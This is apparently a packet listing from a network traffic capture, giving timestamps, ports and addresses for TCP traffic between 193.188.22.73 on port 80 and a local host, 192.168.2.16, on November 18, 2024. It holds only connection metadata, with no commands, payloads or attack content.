                                                                                                                                                                                            Nov 18, 2024 21:01:18.674824953 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674860954 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.674889088 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.676079988 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.676117897 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.676143885 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.676175117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.676223040 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.677098036 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.677133083 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.677170038 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.677189112 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.677958965 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.677994013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678019047 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678029060 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678078890 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678245068 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678320885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678356886 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678370953 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.678845882 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679397106 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679433107 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679450989 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679470062 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679507971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679522991 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679725885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679769039 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679780960 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679804087 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679841995 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.679855108 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.680845976 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.680882931 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.680903912 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.680918932 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.680954933 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.680969000 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.682328939 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.682365894 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.682387114 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.689183950 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.689183950 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.692461014 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.692555904 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.692562103 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.692595005 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.692639112 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693284035 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693315983 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693351984 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693375111 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693388939 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693449974 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693845034 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693883896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693918943 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.693937063 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695177078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695213079 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695231915 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695247889 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695300102 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695728064 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695765972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695801020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695820093 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695837975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.695903063 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.696729898 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.696767092 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.696801901 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.696819067 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.696836948 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.696887016 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697154045 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697200060 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697237015 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697252035 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697777987 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697813034 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697829962 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697848082 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697882891 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.697899103 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698791981 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698828936 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698847055 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698863029 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698898077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698911905 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698934078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.698986053 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.699757099 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.699793100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.699827909 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.699843884 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.699865103 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.699922085 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700731039 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700767040 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700800896 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700826883 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700836897 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700871944 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.700889111 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.701548100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.701584101 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.701613903 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.701618910 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.701654911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.701668024 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.702450991 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.702486992 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.702516079 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.702522039 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.702569962 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.706029892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.706059933 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.719688892 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.719779968 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.719820976 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.719858885 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720168114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720206022 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720242977 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720582008 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720617056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720645905 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720654011 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720690012 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.720716953 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721594095 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721630096 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721653938 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721663952 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721700907 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721723080 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721736908 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.721796036 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722596884 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722632885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722666979 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722696066 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722702980 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722737074 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.722795963 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.723845959 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.723882914 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.723901987 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.723918915 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.723954916 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.723977089 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724582911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724618912 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724644899 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724654913 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724690914 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724711895 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724725008 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.724782944 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.725568056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.725603104 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.725639105 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.725656033 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.725676060 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.725728035 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.726530075 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.726567030 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.726600885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.726614952 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.726638079 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.726700068 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727433920 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727475882 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727511883 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727533102 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727547884 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727585077 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727603912 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727622986 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.727682114 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728332043 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728368044 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728403091 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728440046 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728444099 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728473902 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728496075 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728512049 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.728571892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.729288101 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.729325056 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.729357958 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.729377031 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.729414940 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.729439974 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730287075 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730323076 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730350018 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730357885 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730395079 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730428934 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730431080 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730472088 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.730505943 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731271982 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731308937 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731345892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731364012 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731400013 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731435061 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731441021 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.731488943 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732254982 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732291937 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732326984 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732355118 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732368946 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732445002 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732605934 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732691050 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.732749939 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733230114 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733264923 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733300924 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733321905 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733335972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733370066 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.733388901 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734250069 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734287024 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734318018 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734321117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734358072 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734371901 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734392881 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734426975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.734457970 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735131979 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735167980 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735193968 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735204935 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735241890 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735256910 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735277891 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.735344887 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736038923 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736076117 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736109972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736131907 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736145020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736180067 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736196995 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736217022 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736268997 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736905098 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736942053 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736977100 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.736998081 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737011909 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737046003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737081051 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737166882 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737759113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737797022 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737831116 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737854004 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737868071 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737904072 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.737921000 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738605976 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738641977 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738676071 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738677025 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738713026 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738730907 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738746881 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738782883 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.738796949 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739398003 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739496946 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739516020 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739536047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739572048 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:18.739590883 CET4994080192.168.2.16193.188.22.73
